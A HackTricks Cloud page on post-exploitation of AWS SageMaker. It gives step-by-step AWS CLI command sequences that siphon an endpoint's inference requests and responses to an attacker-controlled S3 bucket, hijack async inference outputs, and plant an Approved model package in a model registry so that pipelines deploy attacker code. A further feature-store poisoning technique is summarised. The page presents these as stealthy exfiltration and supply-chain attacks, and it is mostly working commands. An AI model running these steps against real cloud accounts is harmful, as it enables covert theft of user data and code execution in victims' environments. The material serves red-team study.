AWS - SageMaker Post-Exploitation

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

SageMaker endpoint data siphon via UpdateEndpoint DataCaptureConfig

Abuse SageMaker endpoint management to enable full request/response capture to an attacker‑controlled S3 bucket without touching the model or container. Uses a zero/low‑downtime rolling update and only requires endpoint management permissions.

Requirements

• IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
• S3: s3:CreateBucket (or use an existing bucket in the same account)
• Optional (if using SSE‑KMS): kms:Encrypt on the chosen CMK
• Target: An existing InService real‑time endpoint in the same account/region

Steps

1. Identify an InService endpoint and gather current production variants

REGION=${REGION:-us-east-1}
EP=$(aws sagemaker list-endpoints --region $REGION --query "Endpoints[?EndpointStatus=='InService']|[0].EndpointName" --output text)
echo "Endpoint=$EP"
CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
echo "EndpointConfig=$CFG"
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CFG" --query ProductionVariants > /tmp/pv.json

2. Prepare attacker S3 destination for captures

ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-capture-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION

3. Create a new EndpointConfig that keeps the same variants but enables DataCapture to the attacker bucket

Note: Use explicit content types that satisfy CLI validation.

NEWCFG=${CFG}-dc
cat > /tmp/dc.json << JSON
{
  "EnableCapture": true,
  "InitialSamplingPercentage": 100,
  "DestinationS3Uri": "s3://$BUCKET/capture",
  "CaptureOptions": [
    {"CaptureMode": "Input"},
    {"CaptureMode": "Output"}
  ],
  "CaptureContentTypeHeader": {
    "JsonContentTypes": ["application/json"],
    "CsvContentTypes": ["text/csv"]
  }
}
JSON
aws sagemaker create-endpoint-config \
  --region $REGION \
  --endpoint-config-name "$NEWCFG" \
  --production-variants file:///tmp/pv.json \
  --data-capture-config file:///tmp/dc.json

4. Apply the new config with a rolling update (minimal/no downtime)

aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"

5. Generate at least one inference call (optional if live traffic exists)

echo '{"inputs":[1,2,3]}' > /tmp/payload.json
aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \
  --content-type application/json --accept application/json \
  --body fileb:///tmp/payload.json /tmp/out.bin || true

6. Validate captures in attacker S3

aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize

Impact

• Full exfiltration of real‑time inference request and response payloads (and metadata) from the targeted endpoint to an attacker‑controlled S3 bucket.
• No changes to the model/container image and only endpoint‑level changes, enabling a stealthy data theft path with minimal operational disruption.

SageMaker async inference output hijack via UpdateEndpoint AsyncInferenceConfig

Abuse endpoint management to redirect asynchronous inference outputs to an attacker-controlled S3 bucket by cloning the current EndpointConfig and setting AsyncInferenceConfig.OutputConfig S3OutputPath/S3FailurePath. This exfiltrates model predictions (and any transformed inputs included by the container) without modifying the model/container.

Requirements

• IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
• S3: Ability to write to the attacker S3 bucket (via the model execution role or a permissive bucket policy)
• Target: An InService endpoint where asynchronous invocations are (or will be) used

Steps

1. Gather current ProductionVariants from the target endpoint

REGION=${REGION:-us-east-1}
EP=<target-endpoint-name>
CUR_CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CUR_CFG" --query ProductionVariants > /tmp/pv.json

2. Create an attacker bucket (ensure the model execution role can PutObject to it)

ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-async-exfil-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION || true

3. Clone EndpointConfig and hijack AsyncInference outputs to the attacker bucket

NEWCFG=${CUR_CFG}-async-exfil
cat > /tmp/async_cfg.json << JSON
{"OutputConfig": {"S3OutputPath": "s3://$BUCKET/async-out/", "S3FailurePath": "s3://$BUCKET/async-fail/"}}
JSON
aws sagemaker create-endpoint-config --region $REGION   --endpoint-config-name "$NEWCFG"   --production-variants file:///tmp/pv.json   --async-inference-config file:///tmp/async_cfg.json
aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"

4. Trigger an async invocation and verify objects land in attacker S3

aws s3 cp /etc/hosts s3://$BUCKET/inp.bin
aws sagemaker-runtime invoke-endpoint-async --region $REGION --endpoint-name "$EP" --input-location s3://$BUCKET/inp.bin >/tmp/async.json || true
sleep 30
aws s3 ls s3://$BUCKET/async-out/ --recursive || true
aws s3 ls s3://$BUCKET/async-fail/ --recursive || true

Impact

• Redirects asynchronous inference results (and error bodies) to attacker-controlled S3, enabling covert exfiltration of predictions and potentially sensitive pre/post-processed inputs produced by the container, without changing model code or image and with minimal/no downtime.

SageMaker Model Registry supply-chain injection via CreateModelPackage(Approved)

If an attacker can CreateModelPackage on a target SageMaker Model Package Group, they can register a new model version that points to an attacker-controlled container image and immediately mark it Approved. Many CI/CD pipelines auto-deploy Approved model versions to endpoints or training jobs, resulting in attacker code execution under the service’s execution roles. Cross-account exposure can be amplified by a permissive ModelPackageGroup resource policy.

Requirements

• IAM (minimum to poison an existing group): sagemaker:CreateModelPackage on the target ModelPackageGroup
• Optional (to create a group if one doesn’t exist): sagemaker:CreateModelPackageGroup
• S3: Read access to referenced ModelDataUrl (or host attacker-controlled artifacts)
• Target: A Model Package Group that downstream automation watches for Approved versions

Steps

1. Set region and create/find a target Model Package Group

REGION=${REGION:-us-east-1}
MPG=victim-group-$(date +%s)
aws sagemaker create-model-package-group --region $REGION --model-package-group-name $MPG --model-package-group-description "test group"

2. Prepare dummy model data in S3

ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-mpkg-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION
head -c 1024 </dev/urandom > /tmp/model.tar.gz
aws s3 cp /tmp/model.tar.gz s3://$BUCKET/model/model.tar.gz --region $REGION

3. Register a malicious (here benign) Approved model package version referencing a public AWS DLC image

IMG="683313688378.dkr.ecr.$REGION.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3"
cat > /tmp/inf.json << JSON
{
  "Containers": [
    {
      "Image": "$IMG",
      "ModelDataUrl": "s3://$BUCKET/model/model.tar.gz"
    }
  ],
  "SupportedContentTypes": ["text/csv"],
  "SupportedResponseMIMETypes": ["text/csv"]
}
JSON
aws sagemaker create-model-package --region $REGION   --model-package-group-name $MPG   --model-approval-status Approved   --inference-specification file:///tmp/inf.json

4. Verify the new Approved version exists

aws sagemaker list-model-packages --region $REGION --model-package-group-name $MPG --output table

Impact

• Poison the Model Registry with an Approved version that references attacker-controlled code. Pipelines that auto-deploy Approved models may pull and run the attacker image, yielding code execution under endpoint/training roles.
• With a permissive ModelPackageGroup resource policy (PutModelPackageGroupPolicy), this abuse can be triggered cross-account.

Feature store poisoning

Abuse sagemaker:PutRecord on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with sagemaker:GetRecord, an attacker can read sensitive features. This does not require access to models or endpoints.

{{#ref}} feature-store-poisoning.md {{/ref}}

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.